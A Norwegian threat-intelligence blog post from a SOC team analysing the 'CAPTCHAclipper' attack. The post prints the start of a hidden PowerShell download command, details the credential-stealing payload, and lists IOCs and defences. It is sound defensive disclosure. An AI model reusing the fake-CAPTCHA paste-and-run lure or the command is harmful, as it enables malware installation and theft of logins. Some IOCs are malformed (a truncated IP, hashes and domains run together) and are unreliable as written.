Blogg

Fra CAPTCHA til kompromittering: Analyse av CAPTCHAclipper

I denne bloggen gir våre eksperter deg en analyse av CAPTCHAclipper

Conscias SOC-team avdekket et nytt angrep som utnytter CAPTCHA-meldinger. «CAPTCHAclipper»-angrepet blander sosial manipulasjon og teknisk raffinement for å distribuere skadelig programvare. Les analysen vår for å forstå angrepskjeden, IOC-er og konkrete forsvarstiltak.

Conscia Security Operations Center (SOC)-teamet avdekket nylig en omhyggelig utformet angrepskjede utført av en trusselaktør som utnyttet en tilsynelatende ufarlig CAPTCHA-melding.

Dette angrepet, som vi har kalt CAPTCHAclipper, er et eksempel på hvordan sosial manipulasjon og teknisk raffinement brukes for å kompromittere ofrenes systemer og eksfiltrere sensitive data.

Vi observerte de samme TTP-ene i tre forskjellige angrep i løpet av en måned, alle innenfor den europeiske geografiske regionen.

På grunn av angrepskjedens natur mistenker vi at en sofistikert trusselaktør står bak disse angrepene. Vi kan imidlertid ikke gi noen attribusjon i skrivende stund. Hovedkomponenten er sannsynligvis en variant av LummaC2 malware.

Da vi først undersøkte hendelsen, ble de oppgitte IOC-ene ikke flagget som ondsinnede, noe som indikerer bruken av nye TTP-er. Men fra og med publisering av denne artikkelen kan vi allerede se at visse AV-motorer gjenkjenner i det minste noen av IOC-ene, men de kan enkelt endres og gjenbrukes.

Nedenfor diskuterer vi ulike stadier av angrepskjeden.

Analyse av angrepskjeden

Trinn 1: Det ondsinnede CAPTCHA-agnet

Angrepet begynte med et målrettet lokkemiddel: brukere ble henvist til et ondsinnet, men legitimt utseende, nettsted som var vert for en PDF-fil som brukeren kunne laste ned i en phishing-felle. Før nedlasting, blir offeret presentert med interaktiv CAPTCHA.

Dette første trinnet tjente to formål:

Det initierte den første tekniske utnyttelsen via JavaScript, som vi også gjenkjenner som ‘ClickFix‘ eller ‘paste and run’-teknikk.

Det etablerte et lag med tillit ved å etterligne legitime verifiseringsmetoder.

Når brukere engasjerte seg med CAPTCHA for å få tilgang til en lovet PDF-fil, ble en ondsinnet JavaScript-kode kjørt stille i bakgrunnen.

Dette skriptet kopierte en PowerShell-kommando til systemets utklippstavle, og forberedte grunnen for neste trinn:

powershell -WindowStyle Hidden -Command “$rQd=‘https://s3-scw-tx.b-cdn[.]ne

Trinn 2: Sosial manipulasjon med ondsinnede instruksjoner

Etter å ha fullført CAPTCHA, mottok ofrene et varsel om bekreftelsestrinn før de kunne laste ned filen. For å laste den ned, måtte offeret følge instruksjonene som ble gitt, og som var avgjørende for angrepets suksess.

1. Trykk Win+R for å åpne dialogboksen Run.
2. Trykk CTRL+V for å lime inn utklippstavlekommandoen (uten å være klar over det).
3. Trykk på Enter.

Denne tilsynelatende vennligsinnede kommandoen var i virkeligheten en nøye konstruert leveringsmekanisme som:

• Lastet ned et skadelig skript: prizev2.txtfra en ekstern server.
• Kjørte skriptet helt i minnet, og omgikk filbaserte deteksjoner.

Trinn 3: Distribusjon av ondsinnet nyttelast

Det nedlastede skriptet utførte flere oppgaver for å forberede videre utnyttelse:

1. Lanserte den kjørbare setup.exe, og startet angrepets neste fase.
2. Hentet en ZIP-fil (prize.zip) fra https://fixedzip.oss-ap-southeast-5.aliyuncs.com.
3. Pakket ut ZIP-filinnholdet i en tilfeldig generert mappe i APPDATA-katalogen.

Bruken av APPDATA-katalogen sikret minimal synlighet for rutinemessige sikkerhetsskanninger, og understreker aktørens fokus på unnvikelse.

Trinn 4: Ondsinnede aktiviteter av Setup.exe

Den kjørbare Setup.exe var et potent verktøy designet for både umiddelbar effekt og langsiktig utholdenhet. TTP-ene inkluderte:

Utholdenhetsmekanismer: Registrerer seg selv i Windows Task Scheduler for automatisk kjøring etter at systemet har startet på nytt. Opprette en ekstra fil (69HT8K.pif), potensielt som et lokkemiddel eller et sekundært stadium.

Legitimasjonstyveri: Trekke ut påloggingsinformasjon som er lagret i nettleserfiler (påloggingsdata) for forskjellige nettlesere på deres typiske filplassering.

Rekognosering: Identifisere installert antivirus- og endepunktbeskyttelsesprogramvare for å unngå deteksjon eller deaktivere forsvar.

Kommando-og-kontroll (C2)-kommunikasjon: Etablering av en utgående tilkobling til 21.4.107:443, koblet til domenet sliperyedhby.icu. Denne tilkoblingen la til rette for dataeksfiltrering og tillot ytterligere kommandoer fra angriperen.

Indikatorer for kompromittering (IOC)

Filspor
Filnavn	SHA-256
Setup.exe	d19f31a0c9926824ed9554b254804ab805c8d2d5bc68b4b129e7ef520a673feb8ce1cde3bd1fa945af8e03459775a87dba7275c17401ab19e525b3238609f6b
Autolt3.exe	1da298cab4d537b0b7b5dabf09bff6a212b9e45731e0cc772f99026005fb9e48

Nettverksspor
Domener:	https://s3-scw-tx.b-cdn[.]nethttps://fixedzip.oss-ap-southeast-5.aliyuncs[.]comhttps://dirverif.oss-ap-southeast-5.aliyuncs[.]com/checkpoint/finished/gnerous.txtsliperyedhby[.]icu
IP-adresser:	104.21.4.107

Implikasjoner og lærdommer

CAPTCHAclipper-angrepet viser en sofistikert, flerlags tilnærming til kompromitterende systemer:

• Brukerinteraksjon som angrepsvektor: Avhengigheten av brukerdrevne handlinger (kopier-lim-kommandoer) eksemplifiserer effektiviteten til sosial manipulasjon.
• Minnebasert kjøring: Kjøring av kode i minnet minimerte deteksjon av tradisjonelle antivirusløsninger.
• Vedvarende tilgang og eksfiltrering: Etablering av vedvarende tilgang sikret langsiktig kontroll, mens C2-kommunikasjon muliggjorde datatyveri og fjernkontroll.

Effektive forsvarsstrategier

CaptchaClipper-angrepet er en påminnelse om at angriperne stadig utvikler nye taktikker. Blandingen av teknisk oppfinnsomhet og psykologisk manipulasjon viser viktigheten av proaktive forsvarsstrategier. Ved å utnytte sosial manipulasjon og flertrinns infeksjonsteknikker, omgår angripere effektivt tradisjonelle forsvar og utnytter brukernes tillit.

For å forsvare seg mot slike sofistikerte trusler anbefaler Conscia SOC at organisasjoner tar i bruk en allsidig tilnærming til cybersikkerhet: 

1. Opplæring i brukerbevissthet: Gjennomfør regelmessige opplæringsøkter for å hjelpe ansatte med å gjenkjenne phishing og andre sosiale manipulasjonsteknikker.
2. Aktiver endepunktgjenkjenning og respons (EDR): Distribuer løsninger som kan identifisere og redusere filløs skadelig programvare og mistenkelig PowerShell-aktivitet.
3. Bruk kontinuerlig overvåking av sikkerhetshendelser: Det er ikke nok å distribuere sikkerhetsløsninger hvis du ikke samtidig har analytikere som ser over de potensielle hendelsene. Aktualiteten til deteksjon er avgjørende i denne typen angrep, ettersom det meste av angrepskjeden er automatisert.
4. Begrens PowerShell-bruk: Begrens PowerShell-kjøring til bare signerte skript, og overvåk PowerShell-aktivitet nøye.
5. Nettverksovervåking og deteksjon av datalekkasje: Implementer nettverksovervåkingsverktøy for å oppdage uvanlige utgående tilkoblinger til C2-servere eller uautorisert dataeksfiltrering.
6. Planlegging av hendelsesrespons: Sørg for at teamet ditt er forberedt på å reagere på flertrinnsinfeksjoner med en klar utbedringsstrategi.

I tillegg til det oppfordrer vi også alle cybersikkerhetseksperter til å delta aktivt i fellesskapet med andre cybersikkerhetseksperter. Du kan:

• Samarbeide og dele informasjon: Del innsikt og indikatorer for kompromittering (IOC-er) med pålitelige fellesskap for å bekjempe lignende trusler.
• Rapporter og undersøk: Hvis du oppdager lignende aktivitet, rapporter det til leverandørene av trusseletterretning eller nasjonale cybersikkerhetsorganer for å spore nye trender.
• Forbedre trusseljakt: Utnytt denne analysen som et brukstilfelle for å forbedre trusseljaktfunksjonene i organisasjonen.

Om forfatteren